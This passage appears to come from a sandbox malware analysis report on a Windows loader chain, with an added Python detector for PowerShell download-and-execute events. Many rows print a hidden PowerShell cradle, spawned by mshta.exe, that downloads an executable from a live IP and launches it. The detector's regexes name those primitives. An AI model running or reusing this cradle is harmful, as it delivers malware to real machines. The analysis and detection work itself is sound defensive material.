                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeUnpacked PE file: 17.2.m0wsoI3.exe.60900000.1.unpack
                                      Source: cronikxqqq[1].exe.15.dr, gBMthepoZSL1ZVKpeA.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                                      Source: cronikxqqq.exe.15.dr, gBMthepoZSL1ZVKpeA.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
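The mshta.exe to powershell.exe rows above are the download cradle behind the "Powershell download and execute file" Sigma hit: a hidden-window PowerShell builds a drop path from $env:temp, fetches http://176.113.115.7/mine/random.exe with WebClient.DownloadFile and launches it with Start-Process. Two of the three variants append the file name to $env:temp without a backslash, which is why the dropped file shows up elsewhere in this report as C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE (the name glued onto the Temp directory) rather than inside Temp. The following is an added example and not part of the Joe Sandbox report: a small Python detector that applies the same parent/child plus command-line logic to process-creation events. The event shape (parent image, image, command line), the field names and the Temp directory used to resolve the drop path are assumptions; the sample events are constructed from the command lines in the rows above plus one benign line.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# A download primitive and an execution primitive in the same command line
DOWNLOAD_RE = re.compile(
    r"DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
EXEC_RE = re.compile(r"Start-Process|\bsaps\b|Invoke-Expression|\biex\b|Invoke-Item", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
# $d=$env:temp+'<literal>' as written by this loader (assumed shape)
TEMP_CONCAT_RE = re.compile(r"\$env:temp\s*\+\s*'([^']*)'", re.I)


@dataclass
class ProcessEvent:          # assumed event shape (e.g. Sysmon EID 1 fields)
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    rule: str
    parent: str
    urls: List[str]
    drop_path: Optional[str]
    hidden_window: bool


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def resolve_drop_path(cmdline: str,
                      temp_dir: str = r"C:\Users\user\AppData\Local\Temp") -> Optional[str]:
    """Reproduce PowerShell's string '+' on $env:temp: no separator is inserted,
    so a literal without a leading backslash lands next to %TEMP%, not inside it."""
    m = TEMP_CONCAT_RE.search(cmdline)
    return temp_dir + m.group(1) if m else None


def analyze(ev: ProcessEvent) -> Optional[Finding]:
    """Flag PowerShell that both downloads and executes; escalate if a script host spawned it."""
    if basename(ev.image) not in POWERSHELL:
        return None
    cl = ev.command_line
    if not (DOWNLOAD_RE.search(cl) and EXEC_RE.search(cl)):
        return None
    parent = basename(ev.parent_image)
    rule = ("ps_download_execute_from_script_host" if parent in SCRIPT_HOSTS
            else "ps_download_execute")
    return Finding(rule=rule, parent=parent, urls=URL_RE.findall(cl),
                   drop_path=resolve_drop_path(cl),
                   hidden_window=bool(HIDDEN_RE.search(cl)))


# Constructed events: the first two carry the command lines from the report rows,
# the third is benign noise that must not fire.
SAMPLE_EVENTS = [
    ProcessEvent(
        r"C:\Windows\SysWOW64\mshta.exe",
        r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;'''),
    ProcessEvent(
        r"C:\Windows\SysWOW64\mshta.exe",
        r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;'''),
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r'''powershell.exe -NoProfile Get-ChildItem $env:temp'''),
]


def run(events: List[ProcessEvent] = SAMPLE_EVENTS) -> List[Finding]:
    return [f for f in (analyze(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in run():
        print(f)
```

Requiring both a download and an execution verb keeps plain Invoke-WebRequest administration out of the alert stream; the script-host parent is what lifts this from suspicious to high confidence, since mshta.exe has no business starting PowerShell in normal use.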
                                      Source: cronikxqqq[1].exe.15.drStatic PE information: 0xB00FDD35 [Wed Aug 8 20:14:45 2063 UTC]
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_00409220 GetEnvironmentVariableA,lstrcat,lstrcat,lstrcat,SetEnvironmentVariableA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,17_2_00409220
                                      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                      Source: crypted.41[1].exe.15.drStatic PE information: real checksum: 0x0 should be: 0xbd7a2
                                      Source: unicodedata.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0x57bc8
                                      Source: random[1].exe2.6.drStatic PE information: real checksum: 0x1b3266 should be: 0x1bd361
                                      Source: crypted.exe0.15.drStatic PE information: real checksum: 0x0 should be: 0xbd7a2
Source: pyexpat.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0x1e8c7
Source: UD49QH6[1].exe.6.dr | Static PE information: real checksum: 0x1cc568 should be: 0x1ce71d
Source: m0wsoI3[1].exe.6.dr | Static PE information: real checksum: 0x0 should be: 0x37032
Source: m0wsoI3.exe.6.dr | Static PE information: real checksum: 0x0 should be: 0x37032
Source: 83f34278c7.exe.6.dr | Static PE information: real checksum: 0x2027df should be: 0x202602
Source: _imagingcms.cp311-win_amd64.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0x27dbf
Source: _cffi.cp311-win_amd64.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0x40487
Source: _asyncio.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0xd8f5
Source: cronikxqqq.exe.15.dr | Static PE information: real checksum: 0x0 should be: 0x79c75
Source: backend_c.cp311-win_amd64.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0x385b6
Source: _win32sysloader.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0xefa5
Source: pywintypes311.dll.35.dr | Static PE information: real checksum: 0x0 should be: 0x1cc1e
Source: d101bd5267.exe.6.dr | Static PE information: real checksum: 0x1b3266 should be: 0x1bd361
Source: select.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0xda93
Source: random[1].exe1.6.dr | Static PE information: real checksum: 0x207f0e should be: 0x203fd2
Source: python311.dll.35.dr | Static PE information: real checksum: 0x0 should be: 0x1a7a57
Source: libssl-3.dll.35.dr | Static PE information: real checksum: 0x0 should be: 0x47441
Source: mrwipre12[1].exe.15.dr | Static PE information: real checksum: 0x0 should be: 0x8788c
Source: futors.exe.13.dr | Static PE information: real checksum: 0x0 should be: 0x724e5
Source: amnew[1].exe.6.dr | Static PE information: real checksum: 0x0 should be: 0x724e5
Source: mrwipre12.exe.15.dr | Static PE information: real checksum: 0x0 should be: 0x8788c
Source: win32api.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0x18ee4
Source: v7942[1].exe.15.dr | Static PE information: real checksum: 0x0 should be: 0x63e10
Source: M6gQuZPvgY.exe | Static PE information: real checksum: 0x2160e8 should be: 0x216ef4
Source: rapes.exe.0.dr | Static PE information: real checksum: 0x2160e8 should be: 0x216ef4
Source: _imagingft.cp311-win_amd64.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0xb785c
Source: crypted.7[1].exe.15.dr | Static PE information: real checksum: 0x0 should be: 0x78b87
Source: 0629403be8.exe.6.dr | Static PE information: real checksum: 0x207f0e should be: 0x203fd2
Source: _webp.cp311-win_amd64.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0x31963
Source: dw[1].exe.15.dr | Static PE information: real checksum: 0x0 should be: 0xf920
Source: crypted.exe.15.dr | Static PE information: real checksum: 0x0 should be: 0x78b87
Source: pythoncom311.dll.35.dr | Static PE information: real checksum: 0x0 should be: 0x33c75
Source: _rust.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0x22b568
Source: win32trace.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0x12e28
Source: md.cp311-win_amd64.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0x3c52
Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.dr | Static PE information: real checksum: 0x2160e8 should be: 0x216ef4
Source: c1f0508103.exe.6.dr | Static PE information: real checksum: 0x1d229c should be: 0x1d7014
Source: v7942.exe.15.dr | Static PE information: real checksum: 0x0 should be: 0x63e10
Source: cronikxqqq[1].exe.15.dr | Static PE information: real checksum: 0x0 should be: 0x79c75
Source: dw.exe.15.dr | Static PE information: real checksum: 0x0 should be: 0xf920
Source: _imaging.cp311-win_amd64.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0xc8e1b
Source: _imagingmath.cp311-win_amd64.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0x4f30
Source: amnew.exe.6.dr | Static PE information: real checksum: 0x0 should be: 0x724e5
Source: md__mypyc.cp311-win_amd64.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0x16981
Source: libffi-8.dll.35.dr | Static PE information: real checksum: 0x0 should be: 0xa3d3
Source: random[1].exe0.6.dr | Static PE information: real checksum: 0x1d229c should be: 0x1d7014
Source: libcrypto-3.dll.35.dr | Static PE information: real checksum: 0x0 should be: 0x195369
Source: _speedups.cp311-win_amd64.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0xf007
Source: _imagingtk.cp311-win_amd64.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0x1054a
Source: win32ui.pyd.35.dr | Static PE information: real checksum: 0x0 should be: 0x4e017
Source: UD49QH6.exe.6.dr | Static PE information: real checksum: 0x1cc568 should be: 0x1ce71d
Source: random[2].exe.6.dr | Static PE information: real checksum: 0x2027df should be: 0x202602
Source: M6gQuZPvgY.exe | Static PE information: section name:
Source: M6gQuZPvgY.exe | Static PE information: section name: .idata
Source: M6gQuZPvgY.exe | Static PE information: section name:
Source: M6gQuZPvgY.exe | Static PE information: section name: zwbixhzy
Source: M6gQuZPvgY.exe | Static PE information: section name: murqhuul
Source: M6gQuZPvgY.exe | Static PE information: section name: .taggant
Source: rapes.exe.0.dr | Static PE information: section name:
Source: rapes.exe.0.dr | Static PE information: section name: .idata
Source: rapes.exe.0.dr | Static PE information: section name:
Source: rapes.exe.0.dr | Static PE information: section name: zwbixhzy
Source: rapes.exe.0.dr | Static PE information: section name: murqhuul
Source: rapes.exe.0.dr | Static PE information: section name: .taggant
Source: UD49QH6[1].exe.6.dr | Static PE information: section name:
Source: UD49QH6[1].exe.6.dr | Static PE information: section name: .idata
Source: UD49QH6[1].exe.6.dr | Static PE information: section name:
Source: UD49QH6[1].exe.6.dr | Static PE information: section name: nafweblw
Source: UD49QH6[1].exe.6.dr | Static PE information: section name: crjcyqmk
Source: UD49QH6[1].exe.6.dr | Static PE information: section name: .taggant
Source: UD49QH6.exe.6.dr | Static PE information: section name:
Source: UD49QH6.exe.6.dr | Static PE information: section name: .idata
Source: UD49QH6.exe.6.dr | Static PE information: section name:
Source: UD49QH6.exe.6.dr | Static PE information: section name: nafweblw
Source: UD49QH6.exe.6.dr | Static PE information: section name: crjcyqmk
Source: UD49QH6.exe.6.dr | Static PE information: section name: .taggant
Source: m0wsoI3[1].exe.6.dr | Static PE information: section name:
Source: m0wsoI3.exe.6.dr | Static PE information: section name:
Source: random[1].exe0.6.dr | Static PE information: section name:
Source: random[1].exe0.6.dr | Static PE information: section name: .idata
Source: random[1].exe0.6.dr | Static PE information: section name:
Source: random[1].exe0.6.dr | Static PE information: section name: zzezzonx
Source: random[1].exe0.6.dr | Static PE information: section name: iactdlgu
Source: random[1].exe0.6.dr | Static PE information: section name: .taggant
Source: c1f0508103.exe.6.dr | Static PE information: section name:
Source: c1f0508103.exe.6.dr | Static PE information: section name: .idata
Source: c1f0508103.exe.6.dr | Static PE information: section name:
Source: c1f0508103.exe.6.dr | Static PE information: section name: zzezzonx
Source: c1f0508103.exe.6.dr | Static PE information: section name: iactdlgu
Source: c1f0508103.exe.6.dr | Static PE information: section name: .taggant
Source: random[2].exe.6.dr | Static PE information: section name:
Source: random[2].exe.6.dr | Static PE information: section name: .idata
Source: random[2].exe.6.dr | Static PE information: section name:
Source: random[2].exe.6.dr | Static PE information: section name: lmgreshx
Source: random[2].exe.6.dr | Static PE information: section name: wvhccysx
Source: random[2].exe.6.dr | Static PE information: section name: .taggant
Source: 83f34278c7.exe.6.dr | Static PE information: section name:
Source: 83f34278c7.exe.6.dr | Static PE information: section name: .idata
Source: 83f34278c7.exe.6.dr | Static PE information: section name:
Source: 83f34278c7.exe.6.dr | Static PE information: section name: lmgreshx
Source: 83f34278c7.exe.6.dr | Static PE information: section name: wvhccysx
Source: 83f34278c7.exe.6.dr | Static PE information: section name: .taggant
Source: random[1].exe1.6.dr | Static PE information: section name:
Source: random[1].exe1.6.dr | Static PE information: section name: .idata
Source: random[1].exe1.6.dr | Static PE information: section name:
Source: random[1].exe1.6.dr | Static PE information: section name: jtqqduow
Source: random[1].exe1.6.dr | Static PE information: section name: batwxedy
Source: random[1].exe1.6.dr | Static PE information: section name: .taggant
Source: 0629403be8.exe.6.dr | Static PE information: section name:
Source: 0629403be8.exe.6.dr | Static PE information: section name: .idata
Source: 0629403be8.exe.6.dr | Static PE information: section name:
Source: 0629403be8.exe.6.dr | Static PE information: section name: jtqqduow
Source: 0629403be8.exe.6.dr | Static PE information: section name: batwxedy
Source: 0629403be8.exe.6.dr | Static PE information: section name: .taggant
Source: random[1].exe2.6.dr | Static PE information: section name:
Source: random[1].exe2.6.dr | Static PE information: section name: .idata
Source: random[1].exe2.6.dr | Static PE information: section name:
Source: random[1].exe2.6.dr | Static PE information: section name: tojgfqvj
Source: random[1].exe2.6.dr | Static PE information: section name: wmllaexh
Source: random[1].exe2.6.dr | Static PE information: section name: .taggant
Source: d101bd5267.exe.6.dr | Static PE information: section name:
Source: d101bd5267.exe.6.dr | Static PE information: section name: .idata
Source: d101bd5267.exe.6.dr | Static PE information: section name:
Source: d101bd5267.exe.6.dr | Static PE information: section name: tojgfqvj
Source: d101bd5267.exe.6.dr | Static PE information: section name: wmllaexh
Source: d101bd5267.exe.6.dr | Static PE information: section name: .taggant
Source: cronikxqqq[1].exe.15.dr | Static PE information: section name: .CSS
Source: cronikxqqq.exe.15.dr | Static PE information: section name: .CSS
Source: v7942[1].exe.15.dr | Static PE information: section name: .gxfg
Source: v7942[1].exe.15.dr | Static PE information: section name: .retplne
Source: v7942[1].exe.15.dr | Static PE information: section name: _RDATA
Source: v7942.exe.15.dr | Static PE information: section name: .gxfg
Source: v7942.exe.15.dr | Static PE information: section name: .retplne
Source: v7942.exe.15.dr | Static PE information: section name: _RDATA
Source: mozglue.dll.17.dr | Static PE information: section name: .didat
Source: msvcp140.dll.17.dr | Static PE information: section name: .didat
Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.dr | Static PE information: section name:
Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.dr | Static PE information: section name: .idata
Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.dr | Static PE information: section name:
Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.dr | Static PE information: section name: zwbixhzy
Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.dr | Static PE information: section name: murqhuul
Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.dr | Static PE information: section name: .taggant
Source: libffi-8.dll.35.dr | Static PE information: section name: UPX2
Source: mfc140u.dll.35.dr | Static PE information: section name: .didat
Source: VCRUNTIME140.dll.35.dr | Static PE information: section name: _RDATA
Source: _rust.pyd.35.dr | Static PE information: section name: UPX2
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_009572EF pushad ; iretd 13_2_009572F0
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_00969FC1 push ecx; ret 13_2_00969FD4
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_003F72EF pushad ; iretd 14_2_003F72F0
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_00409FC1 push ecx; ret 14_2_00409FD4
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_60983000 pushad ; iretd 17_2_60983031
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_6096D990 push eax; ret 17_2_6096D9C0
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_60911F9E push ecx; mov dword ptr [esp], ebx 17_2_60911FD3
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_60987F71 pushad ; iretd 17_2_60987F74
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_00660A76 push ecx; ret 18_2_00660A89
Source: M6gQuZPvgY.exe | Static PE information: section name: entropy: 7.071163489335255
Source: M6gQuZPvgY.exe | Static PE information: section name: zwbixhzy entropy: 7.954713744727896
Source: rapes.exe.0.dr | Static PE information: section name: entropy: 7.071163489335255
Source: rapes.exe.0.dr | Static PE information: section name: zwbixhzy entropy: 7.954713744727896
Source: UD49QH6[1].exe.6.dr | Static PE information: section name: entropy: 7.980512869522268
Source: UD49QH6[1].exe.6.dr | Static PE information: section name: nafweblw entropy: 7.953826641975752
Source: UD49QH6.exe.6.dr | Static PE information: section name: entropy: 7.980512869522268
Source: UD49QH6.exe.6.dr | Static PE information: section name: nafweblw entropy: 7.953826641975752
Source: m0wsoI3[1].exe.6.dr | Static PE information: section name: .text entropy: 7.245682295128179
Source: m0wsoI3.exe.6.dr | Static PE information: section name: .text entropy: 7.245682295128179
Source: random[1].exe0.6.dr | Static PE information: section name: entropy: 7.986903868538746
Source: random[1].exe0.6.dr | Static PE information: section name: zzezzonx entropy: 7.954384918744277
Source: c1f0508103.exe.6.dr | Static PE information: section name: entropy: 7.986903868538746
Source: c1f0508103.exe.6.dr | Static PE information: section name: zzezzonx entropy: 7.954384918744277
Source: random[2].exe.6.dr | Static PE information: section name: entropy: 7.169971330525206
Source: random[2].exe.6.dr | Static PE information: section name: lmgreshx entropy: 7.954460534575886
Source: 83f34278c7.exe.6.dr | Static PE information: section name: entropy: 7.169971330525206
Source: 83f34278c7.exe.6.dr | Static PE information: section name: lmgreshx entropy: 7.954460534575886
Source: random[1].exe1.6.dr | Static PE information: section name: entropy: 7.14420663079945
Source: random[1].exe1.6.dr | Static PE information: section name: jtqqduow entropy: 7.953455836557056
Source: 0629403be8.exe.6.dr | Static PE information: section name: entropy: 7.14420663079945
Source: 0629403be8.exe.6.dr | Static PE information: section name: jtqqduow entropy: 7.953455836557056
Source: random[1].exe2.6.dr | Static PE information: section name: tojgfqvj entropy: 7.953511808501187
Source: d101bd5267.exe.6.dr | Static PE information: section name: tojgfqvj entropy: 7.953511808501187
Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.dr | Static PE information: section name: entropy: 7.071163489335255
Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.dr | Static PE information: section name: zwbixhzy entropy: 7.954713744727896
Source: cronikxqqq[1].exe.15.dr, GSKpiUyewQVjl3ll2g.cs | High entropy of concatenated method names: 'N64lIWiqvs', 'y3qlLpN8VK', 'ahKlWAIBS3', 'TF7lOb8J3f', 'jgnloPbgcx', 'ra2lnByEPY', 'Gbml9SnirQ', 'XAylfpE7m9', 'wwNljlVFDW', 'qAplaZYBVp'
Source: cronikxqqq[1].exe.15.dr, gBMthepoZSL1ZVKpeA.cs | High entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'NsqrSNUpN', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
Source: cronikxqqq.exe.15.dr, GSKpiUyewQVjl3ll2g.cs | High entropy of concatenated method names: 'N64lIWiqvs', 'y3qlLpN8VK', 'ahKlWAIBS3', 'TF7lOb8J3f', 'jgnloPbgcx', 'ra2lnByEPY', 'Gbml9SnirQ', 'XAylfpE7m9', 'wwNljlVFDW', 'qAplaZYBVp'
Source: cronikxqqq.exe.15.dr, gBMthepoZSL1ZVKpeA.cs | High entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'NsqrSNUpN', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1

                                      Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\_asyncio.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\win32\_win32sysloader.pyd
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin\mfc140u.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\_hashlib.pyd
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\m0wsoI3[1].exe
